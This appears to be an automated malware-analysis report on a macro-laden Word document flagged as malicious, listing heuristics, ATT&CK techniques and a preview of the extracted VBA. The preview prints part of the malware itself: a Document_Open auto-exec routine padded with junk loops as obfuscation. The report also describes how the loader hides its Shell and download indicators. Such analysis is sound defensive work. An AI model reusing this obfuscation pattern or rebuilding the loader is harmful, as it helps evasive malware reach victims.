Verdict: MALICIOUS
Risk Score: 282

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample contains a critical OLE_VBA_SHELL heuristic indicating the use of the Shell() function, and a critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic suggesting an obfuscated auto-exec loader. The Document_Open macro is present and configured to execute code, likely to download and execute a second-stage payload. ClamAV detection further confirms its malicious nature.
Heuristics (7)

- ClamAV: Doc.Malware.Chronos-6897935-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25263 bytes | 0b1828eedc847d8dfc4720cbdf63fb6b4a06948b9818e49a185456d6c52c7624 |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-exec entry point: runs as soon as the document is opened.
Private Sub Document_Open()
juhBgU = StrReverse("TCquQnhMcixUgk")
SfbQlT = "IRzCdWUQXFEk"
MTidmTs = Replace("xJxeRZGhlqBkd", "xJx", "jYsA")
' Junk loop: every assignment below is a dead store (the value is overwritten
' and never read). Padding like this bloats the macro and hides the real logic.
For PiTST = 0 To 361
cADR = Replace("QCzYfLVtPbrUjcfMx", "QCz", "UsGbDW")
cADR = StrReverse("vwpiXkUSGdfXL")
cADR = Replace("iCfDFFJQtCAR", "iCfD", "nJxt")
cADR = "XQrXjGjZ"
cADR = "mAEbFpDcH"
cADR = StrReverse("ussDWmkyDjlSXqB")
cADR = StrReverse("kLerzOedtIBE")
cADR = Replace("nTMiABZrXbz", "nTM", "lDsMHPB")
cADR = Replace("vVDhBwcsjKisESyh", "vVDh", "juBHr")
cADR = Replace("EnEBwlQfrOgwVWkAJO", "EnEB", "OMnrBwI")
cADR = StrReverse("xfWReMOZJyhYZf")
cADR = StrReverse("zIucqPLoiIYxi")
cADR = "hHSMlwVatt"
cADR = "BrlFoD"
cADR = "uwJULrKOP"
cADR = Replace("kxReDIjEKLDAw", "kxR", "WWDZvA")
cADR = Replace("skxfgQCIFCDuRXFC", "skxf", "DYWkDf")
cADR = Replace("QxpFBQqxqrr", "Qxp", "pOHK")
cADR = Replace("jFxTxnmpeBHgmMof", "jFx", "rEMeJ")
cADR = StrReverse("ltgcRDZdJBq")
cADR = Replace("lqRpJFYYPZFDmDdHo", "lqRp", "Iqtpl")
cADR = "vxcDHfPweq"
cADR = StrReverse("PEOdJgTcskwBaznY")
cADR = "jPJTOy"
cADR = StrReverse("eaTuKkJtbMKsf")
Next PiTST
buICYJK = "hrJYfzam"
' Second junk loop, same dead-store pattern.
For FOdqv = 0 To 88
VabX = "avtHoBTIpknK"
VabX = Replace("wKuiezFGxSIPeRP", "wKui", "PizkD")
VabX = StrReverse("xwuToIkepsyKZ")
VabX = StrReverse("FIZIkySvJTTARdGy")
VabX = Replace("vslpBkjzKVF", "vslp", "Qwqpo")
VabX = Replace("BcCLzRidyg", "BcC", "zpSXaje")
VabX = StrReverse("cSIUerVQyPOqHAXlGb")
VabX = StrReverse("MimoSpfgLaCKkQUb")
VabX = "oAIuzetATRsP"
VabX = Replace("WtSXeDfOeSRZnbcrH", "WtS", "OMEVHP")
VabX = StrReverse("GPxoDOwwBEUMsJgy")
VabX = StrReverse("vyboaJAeVvKyHZFJ")
VabX = Replace("zZkIiMADdfmjICdiSK", "zZk", "FMrT")
VabX = Replace("LBRuZBhgasgyuPTSeMg", "LBR", "qredBmU")
VabX = StrReverse("ZgRaKkenZtk")
VabX = Replace("BigaMrCYqPYV", "Biga", "htzPM")
VabX = StrReverse("IeVPseKRvX")
VabX = "iTqFvCRYvLK"
VabX = Replace("HaSZlqareX", "HaSZ", "TrfSg")
VabX = Replace("LOiKfKRoWRaxEio", "LOi", "FEEjecK")
VabX = Replace("HdjHbrvPSRO", "HdjH", "GMlqXcj")
VabX = StrReverse("PfgjJxdOnPJuXmqCzU")
VabX = StrReverse("esyXfTHXDnMJoVwE")
VabX = StrReverse("FWVeVHkSvzHYvcR")
VabX = Replace("MhXZGOdShTiph", "MhXZ", "ZkOz")
Next FOdqv
' Third junk loop, same dead-store pattern.
For AjyQW = 0 To 140
zbgG = Replace("IvtVVaQrCzzcLxYI", "Ivt", "mbkR")
zbgG = Replace("aDXAeBRQgSWPL", "aDX", "QuQZH")
zbgG = StrReverse("zuXUmklBVLDzx")
zbgG = Replace("wVWVlWOWEQRRif", "wVW", "DvVfd")
zbgG = "zDBPhuTQOvnJ"
zbgG = Replace("TGfCkuXlyLMnwtWo", "TGf", "Blxgdto")
zbgG = StrReverse("sjWrJpxAwH")
zbgG = Replace("vDUsnzohcKO", "vDU", "eJbIicw")
zbgG = Replace("AknSYRByLQgSyWke", "AknS", "MsZMP")
zbgG = "qbXZcv"
zbgG = "pJybkqAYplmZc"
zbgG = StrReverse("LjMRzGVEZYdbQBpGLj")
zbgG = "wDFlGb"
zbgG = "ILnMLKIOHil"
zbgG = StrReverse("mpjbVxzSyBA")
zbgG = Replace("dblzvFEtWJyZye", "dblz", "Ppkk")
zbgG = StrReverse("ZQGAjyDMtHf")
zbgG = StrReverse("lJadpbZDJaoziXkGM")
zbgG = "ZvEShn"
zbgG = StrReverse("oDHBsxrxrVYrE")
zbgG = Replace("gIyuOTpEZKLvBgyMUqT", "gIyu", "beDX")
zbgG = StrReverse("DdCimfPgVyRvcVdpYO")
zbgG = StrReverse("vUJURMQGwb")
zbgG = StrReverse("nGZMmpOHlZQUDwlHDQ")
zbgG = StrReverse("xJeDgCuDaasopmiQ")
Next
```

... (truncated)